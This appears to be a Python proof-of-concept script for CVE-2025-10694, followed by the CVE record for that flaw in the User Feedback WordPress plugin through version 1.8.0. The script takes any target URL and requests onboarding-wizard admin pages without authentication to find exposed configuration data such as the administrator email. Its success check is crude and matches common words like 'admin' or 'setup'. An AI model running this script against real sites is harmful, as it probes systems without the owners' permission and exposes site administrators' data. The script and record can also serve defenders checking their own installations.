CVE-2025-10694

# CVE-2025-10694 PoC - Unauthenticated Access to Onboarding Wizard # Affected: User Feedback WordPress Plugin <= 1.8.0 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-10694 """ # Common onboarding wizard URL paths paths = [ '/wp-admin/admin.php?page=userfeedback_onboarding', '/wp-admin/admin.php?page=userfeedback-setup', '/wp-admin/admin.php?page=userfeedback-get-started' ] vulnerable = False exposed_data = [] for path in paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, allow_redirects=False) # Check if response indicates successful access to wizard if response.status_code == 200: # Look for indicators of onboarding wizard content content = response.text.lower() if 'admin' in content or 'email' in content or 'setup' in content: vulnerable = True exposed_data.append({ 'url': url, 'status': response.status_code, 'indicators': ['admin', 'email', 'setup'] }) except requests.RequestException as e: print(f"Error accessing {url}: {e}") return vulnerable, exposed_data def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-10694.py <target_url>") print("Example: python cve-2025-10694.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Checking vulnerability CVE-2025-10694 on {target}") is_vulnerable, data = check_vulnerability(target) if is_vulnerable: print("[+] VULNERABLE: Onboarding wizard accessible without authentication") print(f"[+] Exposed data URLs: {len(data)}") for item in data: print(f" - {item['url']}") else: print("[-] NOT VULNERABLE or target not accessible") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-10694", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:32.620", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `maybe_load_onboarding_wizard` function in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to access the onboarding wizard page and view configuration information including the administrator email address."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3378233/userfeedback-lite/trunk/includes/admin/class-userfeedback-onboarding-wizard.php?old=3354862&old_path=userfeedback-lite%2Ftrunk%2Fincludes%2Fadmin%2Fclass-userfeedback-onboarding-wizard.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9026b417-4b35-4bec-9dc6-6797661dc7a8?source=cve", "source": "[email protected]"}]}}